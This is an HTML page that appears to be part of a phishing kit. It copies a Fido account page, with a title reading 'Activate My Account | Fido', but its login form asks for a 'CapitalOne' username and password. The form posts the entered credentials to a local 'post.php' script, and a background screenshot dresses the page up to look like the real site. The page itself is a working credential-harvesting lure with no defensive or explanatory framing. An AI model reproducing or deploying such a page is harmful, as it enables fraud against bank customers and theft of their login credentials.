<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html ng-app="eclipseApp" class="no-js" ute-language="" ng-strict-di="" style="margin: 0px; width: 10%;"><head><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}</style><meta charset="utf-8"><title>Activate My Account | Fido</title><meta name="description" content=""><meta name="viewport" content="width = device-width"><meta name="viewport" content="width = 320"><link rel="stylesheet" href="./Fido_files/eclipse-f6776302.css"><link rel="stylesheet" href="./Fido_files/cms.css"><script src="./Fido_files/ga.js"></script><style type="text/css">{visibility: hidden;}</style><script src="./Fido_files/s-code-contents-041c45b64e2da4eee7526b6d2a6aea94fef51ebe.js"></script><script src="./Fido_files/gateway.min.js" type="text/javascript" async="true" data-vendor="acs" data-role="gateway"></script><script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="//gateway.answerscloud.com/ssp-rogers-ca/production/foresee/foresee_trigger.js?v=R035E61FD23" src="./Fido_files/foresee_trigger.js"></script><link rel="stylesheet" href="./Fido_files/providers.css" type="text/css"><link rel="stylesheet" href="./Fido_files/widgets.css" type="text/css"><style>
div.image {
	position:absolute;
   width:343px; /*width of your image*/
   height:601px; /*height of your image*/
   background-image:url('./img/full.jpg');
   z-index: -1;
top:0px;
  }
div.x{
	position:absolute;
   width:34px; /*width of your image*/
   height:31px; /*height of your image*/
   background-image:url('./img/x.jpg');
	top: 25px; 
	left: 280px;
}
</style><script type="text/javascript">

function isNumberKey(evt)
		   {
			  var charCode = (evt.which) ? evt.which : evt.keyCode;
			  if (charCode != 46 && charCode > 31 
				&& (charCode < 48 || charCode > 57))
				return false;
				
			}
		
function vUser() {
    if (document.getElementById("userID").value == "") {
		 document.getElementById("da").innerHTML ="Please enter your Fido number";
		 document.getElementById("btn").disabled = true;
		}else{
			document.getElementById("da").innerHTML ="";
			document.getElementById("btn").disabled = false;
		}
	
}
function vPass() {
 
	if (document.getElementById("password").value == "") {
		
		 document.getElementById("pa").innerHTML ="Please enter your password";
		  document.getElementById("btn").disabled = true;
		}else{
			document.getElementById("pa").innerHTML ="";
			document.getElementById("btn").disabled = false;
		}
}

</script>
  
  
  <!--[if IE]>
  <link type="image/x-icon" href="/html-fido/cms/ute/fido/images/favicons/favicon.ico" rel="shortcut icon">
  <![endif]-->

  
 



  

  

</head>
<body style="background-image: url(Capture.JPG);">
<div class="image"></div><div style="display: block;" id="signIn" class="janrain-capture-ui capture-ui-content capture_screen_container janrain-capture-ui-mobile janrain-capture-ui-mobile-landscape" data-capturescreenname="signIn" data-captureventadded="true">
  <div class="capture_header">
    <h4 class="">
      <ins translate="global.cta.logIn"></ins></h4><h4 class=""><br></h4><h4 class=""><br></h4><h4 class=""><ins translate="global.cta.logIn">Log in to My account CapitalOne</ins>
    </h4>
  </div>
  <div class="capture_signin">

     <div id="capture_signIn_signInForm_successMessages" style="display: none;">
       <h4><ins translate="signin-right-on">Right on!</ins></h4>
       <div class="capture_form_success"></div>
     </div>
    <form id="capture_signIn_signInForm" name="signInForm" data-capturefield="signInForm" action="post.php" class="capture_form capture_signInForm" method="post">
	
	
    <div id="capture_signIn_form_item_userID" class="capture_form_item capture_text capture_form_item_userID capture_error" data-capturefield="undefined" data-capturescreenname="signIn">
	Username <input id="userID" data-capturefield="userID" value="" class="capture_userID capture_required capture_text_input" maxlength="10" placeholder=" CapitalOne Username" name="userID" data-capturescreenname="signIn " onkeypress="return isNumberKey(event)" onfocusout="vUser()" type="tel">
	<div class="capture_tip" style="display: none;"></div>
	<div class="error">
             <label id="da" for="da" style="color: red; font-size: 13px;"></label>
                 </div>
	</div>
    <div id="capture_signIn_form_item_currentPassword" class="capture_form_item capture_password capture_form_item_currentPassword" data-capturefield="undefined"><label for="capture_signIn_currentPassword">Password</label>
	<input id="password" data-capturefield="currentPassword" value="" class="capture_currentPassword capture_required capture_text_input" placeholder="Existing password" name="password" onfocusout="vPass()" type="password"><div class="capture_tip" style="display: none;"></div>
	<br><br>
	</div>
		
    <div class="capture_rightText">
      <button id="btn" class="capture_secondary capture_btn capture_primary" type="submit"><span class="janrain-icon-16 janrain-icon-key"></span>Log In</button><br><br><br><br><br>
      <div class="spacer-10"><h4 class=""><ins><img style="width: 140px; height: 49px;" alt="" src="https://www.capitalone.ca/img/ca/header/capital-one.png"></ins></h4></div>
     
    </div>
    </form>
  </div>
</div><a href="#" class="janrain_modal_closebutton" style="position: absolute; cursor: pointer; z-index: 1000;"></a>


</body></html>